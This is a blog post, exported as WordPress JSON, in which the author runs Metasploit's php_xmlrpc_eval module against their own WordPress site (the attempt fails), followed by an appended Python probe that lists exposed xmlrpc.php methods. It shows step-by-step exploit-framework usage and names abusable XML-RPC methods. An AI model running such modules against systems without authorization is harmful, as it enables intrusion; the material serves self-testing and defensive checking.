{"id":3393,"date":"2020-01-01T00:33:24","date_gmt":"2019-12-31T15:33:24","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3393"},"modified":"2020-03-07T21:49:34","modified_gmt":"2020-03-07T12:49:34","slug":"metasploit%e3%82%92%e5%88%a9%e7%94%a8%e3%81%97%e3%81%a6%e3%80%81%e8%87%aa%e3%82%b5%e3%82%a4%e3%83%88%e3%82%92%e6%94%bb%e6%92%83%e3%81%97%e3%81%a6%e3%81%bf%e3%81%9f","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3393","title":{"rendered":"Using Metasploit to attack my own site"},"content":{"rendered":"<p>Note: carrying out what this article describes against a system you do not administer, without permission, is illegal, so never do it.<br \/>\nThese steps continue from <a href=\"https:\/\/tech.akat.info\/?p=3388\">Trying Kali Linux on Docker for Windows<\/a>.<br \/>\nIt is not much of an attack: I only tried one exploit module against xmlrpc.php.<\/p>\n<h2>Preparation<\/h2>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nPS C:\\Users\\shimizu&gt; docker exec -it (container ID) \/bin\/bash\r\n\r\nroot@81c581d5cf43:\/# apt-get update &amp;&amp; apt-get -y upgrade &amp;&amp; apt-get install -y kali-linux-web\r\n...(restart the container after the upgrade)\r\n\r\nroot@81c581d5cf43:\/# \/etc\/init.d\/postgresql start\r\nStarting PostgreSQL 12 database server: main.\r\n\r\nroot@81c581d5cf43:\/# update-rc.d postgresql enable\r\n\r\nroot@81c581d5cf43:\/# msfdb init\r\n...\r\n<\/pre>\n<p>msfdb init needs a running PostgreSQL, which is why it is started first. A Docker container has no init system, so update-rc.d postgresql enable does not make PostgreSQL come back on the next docker start; run \/etc\/init.d\/postgresql start again by hand before msfconsole, otherwise msfconsole runs without its database.<\/p>\n<h2>Running Metasploit<\/h2>\n<pre class=\"brush: plain; title: ; notranslate\" 
title=\"\">\r\nroot@81c581d5cf43:\/# msfconsole\r\n\r\n               .;lxO0KXXXK0Oxl:.\r\n           ,o0WMMMMMMMMMMMMMMMMMMKd,\r\n        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,\r\n      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:\r\n    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,\r\n   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo\r\n  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk\r\n oMMMMMMMMMMx.                    dMMMMMMMMMMx\r\n.WMMMMMMMMM:                       :MMMMMMMMMM,\r\nxMMMMMMMMMo                         lMMMMMMMMMO\r\nNMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;\r\nMMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:\r\nNMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:\r\nxMMMMMMMMMd                        ,0MMMMMMMMMMK;\r\n.WMMMMMMMMMc                         'OMMMMMM0,\r\n lMMMMMMMMMMk.                         .kMMO'\r\n  dMMMMMMMMMMWd'                         ..\r\n   cWMMMMMMMMMMMNxc'.                ##########\r\n    .0MMMMMMMMMMMMMMMMWc            #+#    #+#\r\n      ;0MMMMMMMMMMMMMMMo.          
+:+\r\n        .dNMMMMMMMMMMMMo          +#++:++#+\r\n           'oOWMMMMMMMMo                +:+\r\n               .,cdkO0K;        :+:    :+:\r\n                                :::::::+:\r\n                      Metasploit\r\n\r\n       =&#x5B; metasploit v5.0.66-dev                          ]\r\n+ -- --=&#x5B; 1956 exploits - 1092 auxiliary - 336 post       ]\r\n+ -- --=&#x5B; 558 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=&#x5B; 7 evasion                                       ]\r\n<\/pre>\n<h2>Searching for WordPress exploits<\/h2>\n<p>search matches the keyword against every module field (name, description, references, authors), not only the module name, so modules that have nothing to do with WordPress (FreeBSD, Joomla, WinRAR) show up in the list as well; read the Description column before picking one. The module used below, php_xmlrpc_eval, is a generic PHP XML-RPC exploit that lists WordPress among the affected applications.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 &gt; search rank:excellent wordpress\r\n\r\nMatching Modules\r\n================\r\n\r\n   #   Name                                                           Disclosure Date  Rank       Check  Description\r\n   -   ----                                                           ---------------  ----       -----  -----------\r\n   0   exploit\/freebsd\/local\/rtld_execl_priv_esc                      2009-11-30       excellent  Yes    FreeBSD rtld execl() Privilege Escalation\r\n   1   exploit\/multi\/http\/wp_crop_rce                                 2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload\r\n   2   exploit\/multi\/http\/wp_db_backup_rce                            2019-04-24       excellent  Yes    WP Database Backup RCE\r\n   3   exploit\/multi\/http\/wp_ninja_forms_unauthenticated_file_upload  2016-05-04       excellent  Yes    WordPress Ninja Forms Unauthenticated File Upload\r\n   4   exploit\/multi\/http\/wp_responsive_thumbnail_slider_upload       2015-08-28       excellent  Yes    WordPress Responsive Thumbnail Slider Arbitrary File Upload\r\n   5   exploit\/unix\/webapp\/joomla_akeeba_unserialize                  2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution\r\n   6   exploit\/unix\/webapp\/jquery_file_upload                         2018-10-09   
    excellent  Yes    blueimp's jQuery (Arbitrary) File Upload\r\n   7   exploit\/unix\/webapp\/php_xmlrpc_eval                            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution\r\n   8   exploit\/unix\/webapp\/wp_admin_shell_upload                      2015-02-21       excellent  Yes    WordPress Admin Shell Upload\r\n   9   exploit\/unix\/webapp\/wp_advanced_custom_fields_exec             2012-11-14       excellent  Yes    WordPress Plugin Advanced Custom Fields Remote File Inclusion\r\n   10  exploit\/unix\/webapp\/wp_ajax_load_more_file_upload              2015-10-10       excellent  Yes    WordPress Ajax Load More PHP Upload Vulnerability\r\n   11  exploit\/unix\/webapp\/wp_asset_manager_upload_exec               2012-05-26       excellent  Yes    WordPress Asset-Manager PHP File Upload Vulnerability\r\n   12  exploit\/unix\/webapp\/wp_creativecontactform_file_upload         2014-10-22       excellent  Yes    WordPress Creative Contact Form Upload Vulnerability\r\n   13  exploit\/unix\/webapp\/wp_downloadmanager_upload                  2014-12-03       excellent  Yes    WordPress Download Manager (download-manager) Unauthenticated File Upload\r\n   14  exploit\/unix\/webapp\/wp_easycart_unrestricted_file_upload       2015-01-08       excellent  No     WordPress WP EasyCart Unrestricted File Upload\r\n   15  exploit\/unix\/webapp\/wp_foxypress_upload                        2012-06-05       excellent  Yes    WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution\r\n   16  exploit\/unix\/webapp\/wp_frontend_editor_file_upload             2012-07-04       excellent  Yes    WordPress Front-end Editor File Upload\r\n   17  exploit\/unix\/webapp\/wp_holding_pattern_file_upload             2015-02-11       excellent  Yes    WordPress Holding Pattern Theme Arbitrary File Upload\r\n   18  exploit\/unix\/webapp\/wp_inboundio_marketing_file_upload         2015-03-24       excellent  Yes    WordPress InBoundio Marketing PHP 
Upload Vulnerability\r\n   19  exploit\/unix\/webapp\/wp_infusionsoft_upload                     2014-09-25       excellent  Yes    WordPress InfusionSoft Upload Vulnerability\r\n   20  exploit\/unix\/webapp\/wp_lastpost_exec                           2005-08-09       excellent  No     WordPress cache_lastpostdate Arbitrary Code Execution\r\n   21  exploit\/unix\/webapp\/wp_mobile_detector_upload_execute          2016-05-31       excellent  Yes    WordPress WP Mobile Detector 3.5 Shell Upload\r\n   22  exploit\/unix\/webapp\/wp_nmediawebsite_file_upload               2015-04-12       excellent  Yes    WordPress N-Media Website Contact Form Upload Vulnerability\r\n   23  exploit\/unix\/webapp\/wp_optimizepress_upload                    2013-11-29       excellent  Yes    WordPress OptimizePress Theme File Upload Vulnerability\r\n   24  exploit\/unix\/webapp\/wp_photo_gallery_unrestricted_file_upload  2014-11-11       excellent  Yes    WordPress Photo Gallery Unrestricted File Upload\r\n   25  exploit\/unix\/webapp\/wp_pixabay_images_upload                   2015-01-19       excellent  Yes    WordPress Pixabay Images PHP Code Upload\r\n   26  exploit\/unix\/webapp\/wp_plainview_activity_monitor_rce          2018-08-26       excellent  Yes    WordPress Plainview Activity Monitor RCE\r\n   27  exploit\/unix\/webapp\/wp_platform_exec                           2015-01-21       excellent  No     WordPress Platform Theme File Upload Vulnerability\r\n   28  exploit\/unix\/webapp\/wp_property_upload_exec                    2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability\r\n   29  exploit\/unix\/webapp\/wp_reflexgallery_file_upload               2012-12-30       excellent  Yes    WordPress Reflex Gallery Upload Vulnerability\r\n   30  exploit\/unix\/webapp\/wp_revslider_upload_execute                2014-11-26       excellent  Yes    WordPress RevSlider File Upload and Execute Vulnerability\r\n   31  
exploit\/unix\/webapp\/wp_slideshowgallery_upload                 2014-08-28       excellent  Yes    WordPress SlideShow Gallery Authenticated File Upload\r\n   32  exploit\/unix\/webapp\/wp_symposium_shell_upload                  2014-12-11       excellent  Yes    WordPress WP Symposium 14.11 Shell Upload\r\n   33  exploit\/unix\/webapp\/wp_total_cache_exec                        2013-04-17       excellent  Yes    WordPress W3 Total Cache PHP Code Execution\r\n   34  exploit\/unix\/webapp\/wp_worktheflow_upload                      2015-03-14       excellent  Yes    WordPress Work The Flow Upload Vulnerability\r\n   35  exploit\/unix\/webapp\/wp_wpshop_ecommerce_file_upload            2015-03-09       excellent  Yes    WordPress WPshop eCommerce Arbitrary File Upload Vulnerability\r\n   36  exploit\/unix\/webapp\/wp_wptouch_file_upload                     2014-07-14       excellent  Yes    WordPress WPTouch Authenticated File Upload\r\n   37  exploit\/unix\/webapp\/wp_wysija_newsletters_upload               2014-07-01       excellent  Yes    WordPress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload\r\n   38  exploit\/windows\/fileformat\/ms12_005                            2012-01-10       excellent  No     MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability\r\n   39  exploit\/windows\/fileformat\/winrar_name_spoofing                2009-09-28       excellent  No     WinRAR Filename Spoofing\r\n<\/pre>\n<h2>Select php_xmlrpc_eval and display its information<\/h2>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 &gt; use exploit\/unix\/webapp\/php_xmlrpc_eval\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) &gt; info\r\n\r\n       Name: PHP XML-RPC Arbitrary Code Execution\r\n     Module: exploit\/unix\/webapp\/php_xmlrpc_eval\r\n   Platform: Unix\r\n       Arch: cmd\r\n Privileged: No\r\n    License: Metasploit Framework License (BSD)\r\n       Rank: 
Excellent\r\n  Disclosed: 2005-06-29\r\n\r\nProvided by:\r\n  hdm &lt;x@hdm.io&gt;\r\n  cazz &lt;bmc@shmoo.com&gt;\r\n\r\nAvailable targets:\r\n  Id  Name\r\n  --  ----\r\n  0   Automatic\r\n\r\nCheck supported:\r\n  Yes\r\n\r\nBasic options:\r\n  Name     Current Setting  Required  Description\r\n  ----     ---------------  --------  -----------\r\n  PATH     \/xmlrpc.php      yes       Path to xmlrpc.php\r\n  Proxies                   no        A proxy chain of format type:host:port&#x5B;,type:host:port]&#x5B;...]\r\n  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'\r\n  RPORT    80               yes       The target port (TCP)\r\n  SSL      false            no        Negotiate SSL\/TLS for outgoing connections\r\n  VHOST                     no        HTTP server virtual host\r\n\r\nPayload information:\r\n  Space: 512\r\n\r\nDescription:\r\n  This module exploits an arbitrary code execution flaw discovered in\r\n  many implementations of the PHP XML-RPC module. 
This flaw is\r\n  exploitable through a number of PHP web applications, including but\r\n  not limited to Drupal, WordPress, Postnuke, and TikiWiki.\r\n\r\nReferences:\r\n  https:\/\/cvedetails.com\/cve\/CVE-2005-1921\/\r\n  OSVDB (17793)\r\n  http:\/\/www.securityfocus.com\/bid\/14088\r\n<\/pre>\n<h2>Set the options and run it<\/h2>\n<p>This WordPress instance is not vulnerable (CVE-2005-1921 was fixed in WordPress 1.5.1.3 back in 2005), so the exploit fails. Two things to keep in mind when reading the output: the module advertises Check supported: Yes, so running check before exploit is the non-destructive way to test for the flaw; and exploit failed: no response only means the host did not answer the module's request in the way it expects, which is also what a WAF block page or a wrong virtual host produces. For a site served by name, set VHOST to the host name as well, so that the Host header is the site name regardless of how RHOSTS is resolved.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) &gt; set RHOSTS tech.akat.info\r\nRHOSTS =&gt; tech.akat.info\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) &gt; set RPORT 443\r\nRPORT =&gt; 443\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) &gt; set SSL true\r\nSSL =&gt; true\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) &gt; show options\r\n\r\nModule options (exploit\/unix\/webapp\/php_xmlrpc_eval):\r\n\r\n   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   PATH     \/xmlrpc.php      yes       Path to xmlrpc.php\r\n   Proxies                   no        A proxy chain of format type:host:port&#x5B;,type:host:port]&#x5B;...]\r\n   RHOSTS   tech.akat.info   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'\r\n   RPORT    443              yes       The target port (TCP)\r\n   SSL      true             no        Negotiate SSL\/TLS for outgoing connections\r\n   VHOST                     no        HTTP server virtual host\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic\r\n\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) &gt; exploit\r\n...\r\n&#x5B;-] exploit failed: no response\r\n&#x5B;*] Exploit completed, but no session was 
created.\r\n<\/pre>\n<h2>Supplement: exploit information can also be browsed in a GUI<\/h2>\n<p>https:\/\/www.exploit-db.com\/<br \/>\n<a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/01\/2020-03-07_214809.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/01\/2020-03-07_214809-300x159.png\" alt=\"\" width=\"300\" height=\"159\" class=\"alignnone size-medium wp-image-3506\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/01\/2020-03-07_214809-300x159.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/01\/2020-03-07_214809-1024x544.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/01\/2020-03-07_214809-768x408.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/01\/2020-03-07_214809-1536x816.png 1536w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/01\/2020-03-07_214809-2048x1087.png 2048w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Note: carrying out what this article describes against a system you do not administer, without permission, is illegal, so never do it. These steps continue from Trying Kali Linux on Docker for Windows. It is not much of an 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3393"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3393"}],"version-history":[{"count":5,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3393\/revisions"}],"predecessor-version":[{"id":3507,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3393\/revisions\/3507"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3393"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3393"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3393"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
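An added check for the "Set the options and run it" section of the post above (example code written for this page, not code from the original post or from Metasploit): before reading exploit failed: no response as "patched", confirm that xmlrpc.php answers XML-RPC at all. The probe sends the standard system.listMethods call with Python's xmlrpc.client and classifies the body it gets back as a live method list, an XML-RPC fault, or something that is not XML-RPC (a WAF block page, a 404, an HTML login page), which is the case that looks like "no response" to an exploit module. The list of methods it flags (pingback.ping, system.multicall, wp.getUsersBlogs) is my own selection of WordPress XML-RPC methods that site owners usually want to know are exposed, the target URL is whatever the caller passes in, and the three sample responses are constructed for the illustration, not captured from tech.akat.info.

```python
"""Probe a WordPress xmlrpc.php endpoint with XML-RPC system.listMethods and
classify the answer, so that Metasploit's "exploit failed: no response" can be
told apart from "endpoint reachable, module simply does not apply".

Added example for this page; not code from the original post or from
Metasploit. The sample responses at the bottom are constructed, not captured.
"""
import sys
import urllib.error
import urllib.request
import xmlrpc.client
from typing import Callable, Dict, List

# Methods whose exposure a site owner usually wants to know about (my own
# selection, an assumption of this example): pingback.ping is abused for
# reflected DoS and internal port scanning, system.multicall batches
# wp.getUsersBlogs credential guesses into one request.
METHODS_OF_INTEREST = ("pingback.ping", "system.multicall", "wp.getUsersBlogs")


def build_request(method: str = "system.listMethods") -> bytes:
    """Serialise a parameter-less XML-RPC methodCall as a text/xml body."""
    return xmlrpc.client.dumps((), methodname=method).encode("utf-8")


def classify_response(body: bytes) -> Dict[str, object]:
    """Classify the raw HTTP response body returned for build_request().

    state: 'xmlrpc'     - a methodResponse carrying a method list (endpoint live)
           'fault'      - an XML-RPC fault (endpoint live but it refused the call,
                          e.g. XML-RPC disabled by a plugin)
           'not_xmlrpc' - anything else: WAF block page, 404, HTML login page.
                          This is what an exploit module reports as no response,
                          and it says nothing about the target's patch level.
    """
    text = body.decode("utf-8", errors="replace")
    try:
        params, _ = xmlrpc.client.loads(text)
    except xmlrpc.client.Fault as fault:
        return {"state": "fault", "methods": [], "exposed": [],
                "detail": f"fault {fault.faultCode}: {fault.faultString}"}
    except Exception as exc:  # ExpatError (not XML), ResponseError (XML, not XML-RPC)
        return {"state": "not_xmlrpc", "methods": [], "exposed": [],
                "detail": f"not an XML-RPC methodResponse ({type(exc).__name__})"}
    methods: List[str] = []
    if params and isinstance(params[0], (list, tuple)):
        methods = [str(m) for m in params[0]]
    exposed = [m for m in METHODS_OF_INTEREST if m in methods]
    return {"state": "xmlrpc", "methods": methods, "exposed": exposed,
            "detail": f"{len(methods)} methods listed"}


def http_transport(url: str, timeout: float = 10.0) -> Callable[[bytes], bytes]:
    """Real transport: POST the body to url (e.g. https://your-site.example/xmlrpc.php).

    HTTP error responses are returned as bodies rather than raised, because for
    this check a 403 block page is a finding in its own right.
    """
    def send(body: bytes) -> bytes:
        req = urllib.request.Request(url, data=body, method="POST",
                                     headers={"Content-Type": "text/xml"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.read()
        except urllib.error.HTTPError as err:
            return err.read()
    return send


def probe(transport: Callable[[bytes], bytes]) -> Dict[str, object]:
    """Send system.listMethods through transport and classify the answer."""
    return classify_response(transport(build_request()))


# Constructed sample bodies for the three outcomes (not captured from any host).
SAMPLE_LIVE = xmlrpc.client.dumps(
    (["system.listMethods", "system.multicall", "pingback.ping",
      "wp.getUsersBlogs", "demo.sayHello"],), methodresponse=True).encode("utf-8")
SAMPLE_FAULT = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site.")).encode("utf-8")
SAMPLE_BLOCKED = b"<html><body><h1>403 Forbidden</h1></body></html>"


if __name__ == "__main__":
    # Usage: python3 probe_xmlrpc.py https://your-own-site.example/xmlrpc.php
    # Without an argument the constructed live sample is classified instead.
    if len(sys.argv) > 1:
        print(probe(http_transport(sys.argv[1])))
    else:
        print(probe(lambda _body: SAMPLE_LIVE))
```

Run it only against a host you administer. A state of xmlrpc with an empty exposed list is the healthy outcome for a site that still needs XML-RPC for the mobile app or Jetpack; not_xmlrpc is the result to chase down (WAF, reverse proxy, wrong Host header) before concluding anything from a Metasploit run against the same URL.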